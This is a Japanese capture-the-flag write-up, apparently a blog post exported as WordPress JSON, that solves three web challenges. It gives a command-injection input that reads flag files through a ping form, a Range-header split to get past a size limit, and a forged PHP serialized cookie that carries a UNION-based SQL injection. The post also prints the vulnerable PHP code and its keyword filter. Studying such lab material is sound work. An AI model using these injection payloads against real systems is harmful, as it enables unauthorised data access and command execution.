![\"\"](\"https:\/\/i0.wp.com\/rakuha.com\/wp-content\/uploads\/2022\/06\/image.png?resize=665%2C391&ssl=1\")
<\/figure>\n\n\n\nHTML\u306e\u30bd\u30fc\u30b9(index.html)\u3092\u898b\u308b\u3068\u3001javascript\u3067send\u3068\u3044\u3046\u30e1\u30bd\u30c3\u30c9\u304c\u3042\u308a\u3001\u305d\u3053\u3067\u5165\u529b\u5024\u306e\u30c1\u30a7\u30c3\u30af\u3092\u3057\u3066\u3044\u308b\u3002
\u30b5\u30fc\u30d0\u5074\u306e\u30bd\u30fc\u30b9\uff08main.go\uff09\u3092\u898b\u308b\u3068\u3001\u7279\u306b\u5165\u529b\u5024\u3092\u30c1\u30a7\u30c3\u30af\u3057\u3066\u3044\u306a\u3044\u3002
commnd := “ping -c 1 -W 1 ” + param.Address + ” 1>&2″ \u3068\u3042\u308b\u306e\u3067\u3001\u3053\u3053\u306b\u30b3\u30de\u30f3\u30c9\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u3092\u4ed5\u639b\u3051\u308c\u3070\u3088\u3044\u3068\u601d\u308f\u308c\u308b\u3002
\u30d5\u30e9\u30b0\u306e\u5834\u6240\u306fDockerfile\u3092\u898b\u308b\u3068\/flag_<\u30e9\u30f3\u30c0\u30e0\u6587\u5b57>.txt\u306e\u3088\u3046\u3060\u3002
\u958b\u767a\u8005\u30c4\u30fc\u30eb\u3067send\u30e1\u30bd\u30c3\u30c9\u3092\u66f8\u304d\u63db\u3048\u3066\u3001\u5165\u529b\u30c1\u30a7\u30c3\u30af\u3092\u306a\u304f\u3057\u305f\u5f8c\u3001
\u4ee5\u4e0b\u306e\u30a2\u30c9\u30ec\u30b9\u3092\u5165\u529b\u3057\u3066\u3001\u9001\u4fe1\u3059\u308c\u3070\u30d5\u30e9\u30b0\u304c\u30b2\u30c3\u30c8\u3067\u304d\u308b\u3002<\/p>\n\n\n\n
127.0.0.1;cat \/flag_*.txt<\/code><\/pre><\/div>\n\n\n\n![\"\"](\"https:\/\/i0.wp.com\/rakuha.com\/wp-content\/uploads\/2022\/06\/image-1.png?resize=623%2C545&ssl=1\")
<\/figure>\n\n\n\n[Web] gallery<\/h2>\n\n\n\n![\"\"](\"https:\/\/i0.wp.com\/rakuha.com\/wp-content\/uploads\/2022\/06\/image-2.png?resize=661%2C369&ssl=1\")
<\/figure>\n\n\n\n\u753b\u9762\u3092\u958b\u304f\u3068\u3053\u3093\u306a\u611f\u3058\u3002\u3069\u3046\u3084\u3089\u62e1\u5f35\u5b50\u306b\u5fdc\u3058\u305f\u30d5\u30a1\u30a4\u30eb\u4e00\u89a7\u304c\u5217\u6319\u3055\u308c\u308b\u3089\u3057\u3044\u3002<\/p>\n\n\n\n![\"\"](\"https:\/\/i0.wp.com\/rakuha.com\/wp-content\/uploads\/2022\/06\/image-3.png?resize=768%2C356&ssl=1\")
<\/figure>\n\n\n\nhandlers.go\u3092\u898b\u308b\u3068\u3001flag\u3068\u3044\u3046\u6587\u5b57\u306f\u30c0\u30e1\u3060\u3051\u3069\u3001\u30d5\u30a1\u30a4\u30eb\u540d\u306e\u4e00\u90e8\u304c\u4e00\u81f4\u3057\u3066\u3044\u308c\u3070\u30d2\u30c3\u30c8\u3059\u308b\u3068\u3044\u3046\u3053\u3068\u3067\u3001
javascript\u3067fla\u304c\u542b\u307e\u308c\u3066\u3044\u308b\u30ea\u30b9\u30c8\u30dc\u30c3\u30af\u30b9\u3092\u8ffd\u52a0\u3057\u3066\u9078\u629e\u3057\u3066\u307f\u308b\u3053\u3068\u306b\u3002<\/p>\n\n\n\n![\"\"](\"https:\/\/i0.wp.com\/rakuha.com\/wp-content\/uploads\/2022\/06\/image-4.png?resize=767%2C345&ssl=1\")
<\/figure>\n\n\n\n\u3053\u3093\u306a\u611f\u3058\u3067\u30d5\u30e9\u30b0\u306ePDF\u3092GET\uff01\u3000\u305f\u3060\u3001\u3053\u306e\u72b6\u614b\u3060\u3068\u3001\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u305f\u30d5\u30a1\u30a4\u30eb\u306f\u3059\u3079\u3066?\u306b\u306a\u3063\u3066\u3044\u305f\u3002
\u554f\u984c\u6587\u306b\u3042\u308b\u3088\u3046\u306b\u30b5\u30a4\u30ba\u5236\u9650\u304c\u3057\u3066\u3042\u308b\u3063\u307d\u3044\u3002
main.go\u306b10240byte\u306e\u30b5\u30a4\u30ba\u5236\u9650\u304c\u3055\u308c\u3066\u304a\u308a\u3001\u3053\u308c\u3092\u8d85\u3048\u308b\u3068?\u306b\u7f6e\u63db\u3059\u308b\u3088\u3046\u306b\u306a\u3063\u3066\u3044\u305f\u3002
\u306a\u306e\u3067\u3001Range\u30d8\u30c3\u30c0\u3067\uff12\u56de\u306b\u5206\u3051\u3066\u53d6\u5f97\u3057\u305f\u3002\uff08PDF\u306e\u30b5\u30a4\u30ba\u306f15KB\u307b\u3069\u3060\u3063\u305f\u306e\u3067\u3002
Firefox\u306e\u958b\u767a\u8005\u5c02\u7528\u30c4\u30fc\u30eb\u3067\u7de8\u96c6\u3057\u3066\u518d\u9001\u4fe1\u3092\uff12\u56de\u884c\u3063\u3066\u3001\u305d\u306e\u7d50\u679c\u3092\u305d\u308c\u305e\u308c\u30de\u30fc\u30b8\u3059\u308b\u3002
\uff11\u56de\u76ee\uff1aRange: bytes=0-10239
\uff12\u56de\u76ee\uff1aRange: bytes=10240-
\u203bfirefox\u306e\u958b\u767a\u8005\u5c02\u7528\u30c4\u30fc\u30eb\u3063\u3066\u30d0\u30a4\u30ca\u30ea\u306e\u5834\u5408\u3001Base64\u30a8\u30f3\u30b3\u30fc\u30c9\u3057\u3066\u304f\u308c\u308b\u306e\u3092\u521d\u3081\u3066\u77e5\u3063\u305f
\u203b\u30b3\u30de\u30f3\u30c9\u30d7\u30ed\u30f3\u30d7\u30c8\u306e\u30b3\u30d4\u30fc\u30b3\u30de\u30f3\u30c9\u3067\u30d0\u30a4\u30ca\u30ea\u7d50\u5408\u3067\u304d\u308b\u306e\u3082\u521d\u3081\u3066\u77e5\u3063\u305f…
\u305d\u30fc\u3059\u308b\u3068\u3001PDF\u304c\u53d6\u5f97\u3067\u304d\u308b\u306e\u3067\u3001\u8868\u793a\u3057\u3066\u30d5\u30e9\u30b0\u3092\u30b2\u30c3\u30c8\u3002<\/p>\n\n\n\n![\"\"](\"https:\/\/i0.wp.com\/rakuha.com\/wp-content\/uploads\/2022\/06\/image-6.png?resize=768%2C431&ssl=1\")
<\/figure>\n\n\n\n[Web] serial<\/h2>\n\n\n\n![\"\"](\"https:\/\/i0.wp.com\/rakuha.com\/wp-content\/uploads\/2022\/06\/image-7.png?resize=665%2C296&ssl=1\")
<\/figure>\n\n\n\ndatabase.php\u3092\u898b\u308b\u3068\u3001\u3044\u304b\u306b\u3082\u602a\u3057\u3044\u30e1\u30bd\u30c3\u30c9\u3092\u767a\u898b\u3002<\/p>\n\n\n\n
\/**\n * findUserByName finds a user from database by given userId.\n * \n * @deprecated this function might be vulnerable to SQL injection. DO NOT USE THIS FUNCTION.\n *\/\n public function findUserByName($user = null)\n {\n if (!isset($user->name)) {\n throw new Exception('invalid user name: ' . $user->user);\n }\n\n $sql = "SELECT id, name, password_hash FROM users WHERE name = '" . $user->name . "' LIMIT 1";\n $result = $this->_con->query($sql);\n if (!$result) {\n throw new Exception('failed query for findUserByNameOld ' . $sql);\n }\n\n while ($row = $result->fetch_assoc()) {\n $user = new User($row['id'], $row['name'], $row['password_hash']);\n }\n return $user;\n }<\/code><\/pre><\/div>\n\n\n\nuser->name\u306b\u3044\u3044\u611f\u3058\u306e\u6587\u5b57\u3092\u5165\u308c\u308c\u3070\u3001\u3088\u3055\u305d\u3046\u3002
user.php\u306b\u3042\u308bUser\u30af\u30e9\u30b9\u3092\u898b\u308b\u3068\u4f7f\u3048\u306a\u3044\u30ad\u30fc\u30ef\u30fc\u30c9\u304c\u3042\u308b\u3002\uff08\u3042\u3068\u3067\u308f\u304b\u308b\u3051\u3069\u3001\u3053\u308c\u306f\u5168\u7136\u95a2\u4fc2\u306a\u304b\u3063\u305f…\u3080\u3057\u308d\u30d2\u30f3\u30c8\u306b\u8fd1\u3044\u3002<\/p>\n\n\n\n
class User\n{\n private const invalid_keywords = array("UNION", "'", "FROM", "SELECT", "flag");\n\n public $id;\n public $name;\n public $password_hash;\n\n public function __construct($id = null, $name = null, $password_hash = null)\n {\n $this->id = htmlspecialchars($id);\n $this->name = htmlspecialchars(str_replace(self::invalid_keywords, "?", $name));\n $this->password_hash = $password_hash;\n }\n\n public function __toString()\n {\n return "id: " . $this->id . ", name: " . $this->name . ", pass: " . $this->password_hash;\n }\n\n public function isValid()\n {\n return isset($this->id) && isset($this->name) && isset($this->password_hash);\n }\n}<\/code><\/pre><\/div>\n\n\n\n\u554f\u984c\u3068\u306a\u308bfindUserByName\u3092\u4f7f\u7528\u3057\u3066\u3044\u308b\u7b87\u6240\u306f\u6700\u521d\u306eSignUp\u306e\u3068\u3053\u308d\u3068\u3001
\u305d\u306e\u5f8c\u306e\u753b\u9762\u64cd\u4f5c\u306elogin\u30e1\u30bd\u30c3\u30c9\u3002login\u30e1\u30bd\u30c3\u30c9\u3088\u304f\u898b\u308b\u3068\u3001Cookie\u3092base64\u30c7\u30b3\u30fc\u30c9\u3057\u3066\u3001\u30c7\u30b7\u30ea\u30a2\u30e9\u30a4\u30ba\u3057\u3066\u3044\u308b\u3002
\u305d\u306e\u5f8c\u3001SQL\u3092\u5b9f\u884c\u3057\u3066\u3001\u30cf\u30c3\u30b7\u30e5\u5316\u3055\u308c\u305f\u30d1\u30b9\u30ef\u30fc\u30c9\u304c\u4e00\u81f4\u3057\u3066\u3044\u308c\u3070\u3001SQL\u306e\u5b9f\u884c\u7d50\u679c\u3092Cookie\u306b\u683c\u7d0d\u3057\u3066\u304f\u308c\u305d\u3046\u3002
User\u30af\u30e9\u30b9\u306b\u8a18\u8f09\u3055\u308c\u3066\u3044\u305f\u4f7f\u3048\u306a\u3044\u30ad\u30fc\u30ef\u30fc\u30c9\u3082\u30c7\u30b7\u30ea\u30a2\u30e9\u30a4\u30ba\u3067\u3084\u308b\u306a\u3089\u5927\u4e08\u592b\u3002<\/p>\n\n\n\n
function login()\n{\n if (empty($_COOKIE["__CRED"])) {\n return false;\n }\n\n $user = unserialize(base64_decode($_COOKIE['__CRED']));\n\n \/\/ check if the given user exists\n try {\n $db = new Database();\n $storedUser = $db->findUserByName($user);\n } catch (Exception $e) {\n die($e->getMessage());\n }\n \/\/ var_dump($user);\n \/\/ var_dump($storedUser);\n if ($user->password_hash === $storedUser->password_hash) {\n \/\/ update stored user with latest information\n \/\/ die($storedUser);\n setcookie("__CRED", base64_encode(serialize($storedUser)));\n return true;\n }\n return false;\n}<\/code><\/pre><\/div>\n\n\n\n\u3068\u3044\u3046\u308f\u3051\u3067\u307e\u305a\u306f\u666e\u901a\u306b\u30ed\u30b0\u30a4\u30f3\u3057\u3066\u3001Cookie\u3092\u53d6\u5f97\u3002<\/p>\n\n\n\n
Tzo0OiJVc2VyIjozOntzOjI6ImlkIjtzOjU6IjE3MDA0IjtzOjQ6Im5hbWUiO3M6NjoicmFrdWhhIjtzOjEzOiJwYXNzd29yZF9oYXNoIjtzOjYwOiIkMnkkMTAkRTlBanE5ZGoxQVlPeWhFeDVMNkFOdWtsRXpRUFZ0N28ubWpzUjc3UWNpYi91UWo4TUJiVTIiO30%3D<\/code><\/pre><\/div>\n\n\n\n\u305d\u306e\u5f8c\u3001%3D\u3092=\u306b\u5909\u3048\u3066\u3001base64\u30c7\u30b3\u30fc\u30c9\u3002<\/p>\n\n\n\n
O:4:"User":3:{s:2:"id";s:5:"17004";s:4:"name";s:6:"rakuha";s:13:"password_hash";s:60:"$2y$10$E9Ajq9dj1AYOyhEx5L6ANuklEzQPVt7o.mjsR77Qcib\/uQj8MBbU2";}<\/code><\/pre><\/div>\n\n\n\n\u5404\u6587\u5b57\u5217\u306e\u524d\u306b\u6587\u5b57\u6570\u304c\u3042\u308b\u306e\u3067\u3001\u5909\u66f4\u3057\u305f\u5834\u5408\u306f\u3053\u306e\u6587\u5b57\u6570\u3092\u5909\u3048\u308c\u3070\u3088\u3055\u305d\u3046\u3002
\u3053\u3093\u306a\u611f\u3058\u3067\u5909\u66f4\u3002<\/p>\n\n\n\n
O:4:"User":3:{s:2:"id";s:5:"17004";s:4:"name";s:136:"rakuha' union select 17004, body, '$2y$10$E9Ajq9dj1AYOyhEx5L6ANuklEzQPVt7o.mjsR77Qcib\/uQj8MBbU2' from flags where body like 'ctf4b%' -- ";s:13:"password_hash";s:60:"$2y$10$E9Ajq9dj1AYOyhEx5L6ANuklEzQPVt7o.mjsR77Qcib\/uQj8MBbU2";}<\/code><\/pre><\/div>\n\n\n\n\u3053\u3053\u3067\u6ce8\u610f\u3057\u3066\u307b\u3057\u3044\u306e\u304cflags\u30c6\u30fc\u30d6\u30eb\u306f\u5c0f\u6587\u5b57\u3058\u3083\u306a\u3044\u3068\u3046\u307e\u304f\u3044\u304b\u306a\u3044\u3068\u3053\u308d\u3002
\u6700\u521dUser\u30af\u30e9\u30b9\u3067flag\u304c\u7981\u6b62\u30ef\u30fc\u30c9\u306b\u306a\u3063\u3066\u3044\u305f\u306e\u3067\u3001FLAGS\u3068\u3057\u3066\u3044\u305f\u3068\u3053\u308d\u3067\u7d50\u69cb\u306f\u307e\u308a\u307e\u3057\u305f\u3002\u3002\u3002<\/p>\n\n\n\n
\u305d\u3093\u306a\u308f\u3051\u3067\u2191\u3067\u4f5c\u3063\u305fJSON\u3092Base64\u30a8\u30f3\u30b3\u30fc\u30c9\u3002=\u306f%3D\u306b\u5909\u3048\u3066Cookie\u306b\u8a2d\u5b9a\u3057\u3066\u3001\u518d\u5ea6\u30ea\u30ed\u30fc\u30c9\u3002
\u305d\u3046\u3059\u308b\u3068\u3001Cookie\u306e\u5185\u5bb9\u304c\u5909\u308f\u308b\u306e\u3067\u3001\u305d\u306e\u5185\u5bb9\u3092\u53d6\u5f97\u3057\u3001\u30c7\u30b3\u30fc\u30c9\u3059\u308b\u3068\u3001\u30d5\u30e9\u30b0\u30b2\u30c3\u30c8\u3002<\/p>\n\n\n\n
O:4:"User":3:{s:2:"id";s:5:"17004";s:4:"name";s:43:"ctf4b{Ser14liz4t10n_15_v1rtually_pl41ntext}";s:13:"password_hash";s:60:"$2y$10$E9Ajq9dj1AYOyhEx5L6ANuklEzQPVt7o.mjsR77Qcib\/uQj8MBbU2";}<\/code><\/pre><\/div>\n","protected":false},"excerpt":{"rendered":"\u4eca\u56de\u306f\u4e00\u7dd2\u306b\u50cd\u3044\u3066\u3044\u308b\u65b9\u3005\u3068\u53c2\u52a0\u3057\u3066\u304d\u307e\u3057\u305f\u3002
\nWeb\uff13\u554f\u3060\u3051\u3067\u3059\u304c\u3001writeup \u3057\u307e\u3059\u3002<\/p>\n","protected":false},"author":1,"featured_media":142,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[2],"tags":[],"class_list":["post-131","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ctf"],"aioseo_notices":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/rakuha.com\/wp-content\/uploads\/2022\/06\/%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%BC%E3%83%B3%E3%82%B7%E3%83%A7%E3%83%83%E3%83%88-2022-06-05-230450.png?fit=2062%2C796&ssl=1","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/rakuha.com\/index.php?rest_route=\/wp\/v2\/posts\/131","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/rakuha.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/rakuha.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/rakuha.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/rakuha.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=131"}],"version-history":[{"count":4,"href":"https:\/\/rakuha.com\/index.php?rest_route=\/wp\/v2\/posts\/131\/revisions"}],"predecessor-version":[{"id":145,"href":"https:\/\/rakuha.com\/index.php?rest_route=\/wp\/v2\/posts\/131\/revisions\/145"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/rakuha.com\/index.php?rest_route=\/wp\/v2\/media\/142"}],"wp:attachment":[{"href":"https:\/\/rakuha.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=131"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/rakuha.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=131"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/rakuha.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=131"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}